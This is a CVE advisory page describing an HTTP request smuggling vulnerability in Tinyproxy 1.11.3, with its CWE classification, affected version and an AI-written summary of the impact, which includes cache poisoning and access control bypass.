CVE-2026-54387
Received Received - Intake
Tinyproxy HTTP Request Smuggling Vulnerability

Publication date: 2026-06-17

Last updated on: 2026-06-17

Assigner: VulnCheck

Description
Tinyproxy through 1.11.3, fixed in commit ff45d3b, fails to reconcile conflicting Content-Length and Transfer-Encoding: chunked headers, forwarding both verbatim to the backend while using Content-Length to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-17
Last Modified
2026-06-17
Generated
2026-06-18
AI Q&A
2026-06-18
EPSS Evaluated
N/A
NVD
CVE-2026-54387
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
tinyproxy tinyproxy 1.11.3
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-444 The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability exists in Tinyproxy versions up to 1.11.3. The issue arises because Tinyproxy fails to properly handle conflicting HTTP headers: Content-Length and Transfer-Encoding: chunked. It forwards both headers unchanged to the backend server but uses the Content-Length header to determine how many bytes of the request body to read. This mismatch can cause the proxy and backend server to become desynchronized in parsing the HTTP request.

As a result, a remote attacker can exploit this desynchronization to inject arbitrary HTTP requests to the backend server. This can lead to several security issues such as cache poisoning, bypassing access controls, and hijacking requests.

Impact Analysis

The vulnerability can have serious security impacts including:

  • Cache poisoning - attackers can manipulate cached content served by the backend.
  • Access control bypass - unauthorized users may gain access to restricted resources.
  • Request hijacking - attackers can inject and control HTTP requests sent to the backend.
Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-54387. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart